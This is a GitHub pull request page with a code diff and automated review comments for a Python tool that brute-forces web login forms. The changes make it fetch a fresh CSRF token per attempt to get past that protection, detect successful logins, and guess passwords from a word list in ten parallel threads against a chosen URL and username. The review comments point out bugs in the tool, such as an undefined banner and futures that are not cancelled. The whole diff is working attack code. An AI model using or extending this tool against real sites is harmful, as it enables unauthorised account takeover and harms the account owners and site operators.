-
Notifications
You must be signed in to change notification settings - Fork 95
Fix CSRF handling and improve concurrency in bruteforce script #36
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: master
Are you sure you want to change the base?
Changes from all commits
b140503
1285bf9
3b3169a
5de717e
7744664
b4e84a3
e5e4868
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
| Original file line number | Diff line number | Diff line change | ||||
|---|---|---|---|---|---|---|
|
|
@@ -25,23 +25,28 @@ | |||||
| import time | ||||||
| import sys | ||||||
| import re | ||||||
| import secrets | ||||||
| from bs4 import BeautifulSoup | ||||||
| from concurrent.futures import ThreadPoolExecutor, as_completed | ||||||
|
|
||||||
| class BruteForceCracker: | ||||||
| def __init__(self, url, username, error_message): | ||||||
| def __init__(self, url, username, error_message, username_field="UserName", password_field="Password"): | ||||||
| self.url = url | ||||||
| self.username = username | ||||||
| self.error_message = error_message | ||||||
| self.session = requests.Session() | ||||||
| self.username_field = username_field | ||||||
| self.password_field = password_field | ||||||
| self.csrf_detected = False | ||||||
| self.headers = { | ||||||
| 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36', | ||||||
| } | ||||||
|
|
||||||
| for run in banner: | ||||||
| sys.stdout.write(run) | ||||||
| sys.stdout.flush() | ||||||
| time.sleep(0.02) | ||||||
| # Display banner without sleep | ||||||
| print(banner) | ||||||
|
|
||||||
| def get_csrf_token(self): | ||||||
| def get_csrf_token(self, session): | ||||||
| try: | ||||||
| response = self.session.get(self.url) | ||||||
| response = session.get(self.url, headers=self.headers) | ||||||
| # Try to extract token using BeautifulSoup | ||||||
| soup = BeautifulSoup(response.content, 'html.parser') | ||||||
|
|
||||||
|
|
@@ -60,74 +65,187 @@ def get_csrf_token(self): | |||||
| if match: | ||||||
| return match.group(1), match.group(2) | ||||||
|
|
||||||
| print("Could not find CSRF token. The site might use a different method.") | ||||||
| return None, None | ||||||
| except Exception as e: | ||||||
| print(f"Error getting CSRF token: {e}") | ||||||
| # print(f"Error getting CSRF token: {e}") | ||||||
| return None, None | ||||||
|
|
||||||
| def crack(self, password): | ||||||
| def crack(self, password, verbose=False): | ||||||
| # Create a new session for each attempt to avoid threading issues and ensure fresh cookies | ||||||
| session = requests.Session() | ||||||
|
|
||||||
| # Get a fresh CSRF token for each attempt | ||||||
| token_name, token_value = self.get_csrf_token() | ||||||
| token_name, token_value = self.get_csrf_token(session) | ||||||
|
|
||||||
| # If CSRF was detected initially but extraction failed here, assume failure/error | ||||||
| if self.csrf_detected and (not token_name or not token_value): | ||||||
| # print(f"[-] Failed to retrieve CSRF token for password: {password}") | ||||||
| return False | ||||||
|
|
||||||
| # Prepare the login data | ||||||
| data_dict = {"UserName": self.username, "Password": password, "Log In": "submit"} | ||||||
| data_dict = { | ||||||
| self.username_field: self.username, | ||||||
| self.password_field: password, | ||||||
| "Log In": "submit" | ||||||
|
Comment on lines
+86
to
+89
|
||||||
| } | ||||||
|
|
||||||
| # Add CSRF token if found | ||||||
| if token_name and token_value: | ||||||
| data_dict[token_name] = token_value | ||||||
| print(f"Using CSRF token: {token_name}={token_value[:10]}...") | ||||||
|
|
||||||
| # Make the login attempt | ||||||
| response = self.session.post(self.url, data=data_dict) | ||||||
| try: | ||||||
| # Prepare headers for the attempt | ||||||
| headers = self.headers.copy() | ||||||
| headers['Referer'] = self.url | ||||||
|
|
||||||
| # Check if login was successful | ||||||
| if self.error_message in str(response.content): | ||||||
| return False | ||||||
| else: | ||||||
| print("\n[+] Success!") | ||||||
| print("Username: ---> " + self.username) | ||||||
| print("Password: ---> " + password) | ||||||
| # Make the login attempt | ||||||
| response = session.post(self.url, data=data_dict, headers=headers) | ||||||
|
|
||||||
| # Check status code first - 403 usually means CSRF failure or Forbidden | ||||||
| if response.status_code == 403 or response.status_code >= 500: | ||||||
| return False | ||||||
|
|
||||||
| # Check if login was successful | ||||||
| # Strategy: | ||||||
| # 1. Check for specific error message (negative match) | ||||||
| # 2. Check if we are still on the login page by looking for the password field (fallback negative match) | ||||||
|
|
||||||
| response_text = response.text | ||||||
|
|
||||||
| if self.error_message in str(response.content) or self.error_message in response_text: | ||||||
| return False | ||||||
|
|
||||||
| # Check for redirection | ||||||
| # Normalize URLs by stripping query parameters and trailing slashes | ||||||
| initial_url = self.url.split('?')[0].rstrip('/') | ||||||
| final_url = response.url.split('?')[0].rstrip('/') | ||||||
|
|
||||||
| if initial_url != final_url: | ||||||
| # If we were redirected to a different path and didn't find the error message, assume success. | ||||||
| if verbose: | ||||||
| print(f"\n[+] Success! (Redirected to {final_url})") | ||||||
| print("Username: ---> " + self.username) | ||||||
| print("Password: ---> " + password) | ||||||
| return True | ||||||
|
|
||||||
| # If explicit error message not found AND we are on the same URL path, | ||||||
| # check if the response still contains a password input field. | ||||||
| # If it does, we likely just re-rendered the login page (failed login). | ||||||
| # This handles cases where the user-provided error message was typo'd or not visible in HTML source (e.g., hidden toaster). | ||||||
| if re.search(r'<input[^>]+type=["\']password["\']', response_text, re.I): | ||||||
| return False | ||||||
|
|
||||||
| # If we get here, neither the error message nor the password field was found. | ||||||
| # Assume success (redirected to dashboard, etc.) | ||||||
| if verbose: | ||||||
| print("\n[+] Success!") | ||||||
| print("Username: ---> " + self.username) | ||||||
| print("Password: ---> " + password) | ||||||
| return True | ||||||
| except Exception as e: | ||||||
| # print(f"Request failed for {password}: {e}") | ||||||
| return False | ||||||
|
|
||||||
| def crack_password_wrapper(password, cracker, counter_lock, counter): | ||||||
| password = password.strip() | ||||||
| with counter_lock: | ||||||
| counter[0] += 1 | ||||||
| print(f"Trying: {cracker.username} : {password}") | ||||||
|
|
||||||
| def crack_passwords(passwords, cracker): | ||||||
| count = 0 | ||||||
| for password in passwords: | ||||||
| count += 1 | ||||||
| password = password.strip() | ||||||
| print(f"Trying Password: {count} Time For => {password}") | ||||||
| if cracker.crack(password): | ||||||
| return | ||||||
| if cracker.crack(password, verbose=True): | ||||||
| return True, password | ||||||
| return False, password | ||||||
|
|
||||||
| def main(): | ||||||
| url = input("Enter Target Url: ") | ||||||
| username = input("Enter Target Username: ") | ||||||
| error = input("Enter Wrong Password Error Message: ") | ||||||
|
|
||||||
| print("\n[*] Checking if site uses CSRF protection...") | ||||||
| cracker = BruteForceCracker(url, username, error) | ||||||
| token_name, token_value = cracker.get_csrf_token() | ||||||
| user_field = input("Enter Username Field Name (default: UserName): ").strip() or "UserName" | ||||||
| pass_field = input("Enter Password Field Name (default: Password): ").strip() or "Password" | ||||||
|
|
||||||
| print("\n[*] Initializing...") | ||||||
| cracker = BruteForceCracker(url, username, error, user_field, pass_field) | ||||||
|
|
||||||
| # Test CSRF detection once | ||||||
| session = requests.Session() | ||||||
| token_name, token_value = cracker.get_csrf_token(session) | ||||||
|
|
||||||
| if token_name and token_value: | ||||||
| print(f"[+] CSRF token found: {token_name}") | ||||||
| print("[*] Will attempt to bypass by extracting and including token with each request\n") | ||||||
| cracker.csrf_detected = True | ||||||
| else: | ||||||
| print("[-] No CSRF token found or using a different protection method\n") | ||||||
|
|
||||||
| with open("passwords.txt", "r") as f: | ||||||
| chunk_size = 1000 | ||||||
| cracker.csrf_detected = False | ||||||
|
|
||||||
| # Pre-flight check to prevent false positives | ||||||
| print("[*] Verifying configuration with a random password...") | ||||||
| random_pass = secrets.token_hex(8) | ||||||
|
|
||||||
| # Use a fresh session for pre-flight check to simulate real attempt | ||||||
| # We essentially "crack" a known wrong password. | ||||||
| # If crack() returns True, it means it thinks the login was successful (False Positive). | ||||||
| if cracker.crack(random_pass, verbose=False): | ||||||
| print(f"\n[!] ERROR: False positive detected!") | ||||||
| print(f"[!] The script detected 'Success' for a known wrong password ('{random_pass}').") | ||||||
| print(f"[!] This means the script could not detect the login failure.") | ||||||
| print(f"[!] Please check:") | ||||||
| print(f" 1. Is the Error Message correct?") | ||||||
| print(f" 2. Are the field names correct ({user_field}, {pass_field})?") | ||||||
| print(f" 3. If the error is dynamic/hidden (e.g. toaster), the script fell back to checking for a password field but couldn't find one.") | ||||||
| return | ||||||
| else: | ||||||
| print("[+] Configuration verified. Login failure was correctly detected.") | ||||||
|
|
||||||
| try: | ||||||
| f = open("passwords.txt", "r") | ||||||
| except FileNotFoundError: | ||||||
| print("Error: passwords.txt not found.") | ||||||
| return | ||||||
|
|
||||||
| counter = [0] | ||||||
| counter_lock = threading.Lock() | ||||||
|
|
||||||
| batch_size = 100 | ||||||
| max_workers = 10 | ||||||
| found = False | ||||||
|
|
||||||
| with ThreadPoolExecutor(max_workers=max_workers) as executor: | ||||||
| while True: | ||||||
| passwords = f.readlines(chunk_size) | ||||||
| if not passwords: | ||||||
| # Read a batch of passwords | ||||||
| batch = [] | ||||||
| for _ in range(batch_size): | ||||||
| line = f.readline() | ||||||
| if not line: | ||||||
| break | ||||||
| batch.append(line) | ||||||
|
|
||||||
| if not batch: | ||||||
| break | ||||||
|
|
||||||
| futures = {executor.submit(crack_password_wrapper, pwd, cracker, counter_lock, counter): pwd for pwd in batch} | ||||||
|
||||||
| futures = {executor.submit(crack_password_wrapper, pwd, cracker, counter_lock, counter): pwd for pwd in batch} | |
| futures = [executor.submit(crack_password_wrapper, pwd, cracker, counter_lock, counter) for pwd in batch] |
Copilot
AI
Jan 28, 2026
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The executor.shutdown() method with cancel_futures parameter is only available in Python 3.9+, but there's no fallback mechanism for earlier versions. When a password is found on Python < 3.9, the code will simply break from the loop but all submitted futures in the current batch will still execute, potentially wasting resources. Consider implementing a proper cancellation mechanism or using a shared flag that the crack_password_wrapper function checks before doing work.
Copilot
AI
Jan 28, 2026
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
When breaking from the as_completed loop after finding a password, there may still be unprocessed futures in the current batch. The code breaks out of the inner loop (line 183) but doesn't cancel or wait for the remaining futures, which means they'll continue to execute in the background. This could lead to additional network requests and potential duplicate success messages if another password also succeeds. Consider canceling remaining futures or using a shared stop flag.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The banner variable is referenced here but it's not defined until the bottom of the file (line 193). This will cause a NameError when the BruteForceCracker class is instantiated. The banner should be defined before it's used, or this line should be removed since the banner is already printed at the top of the file (lines 8-20).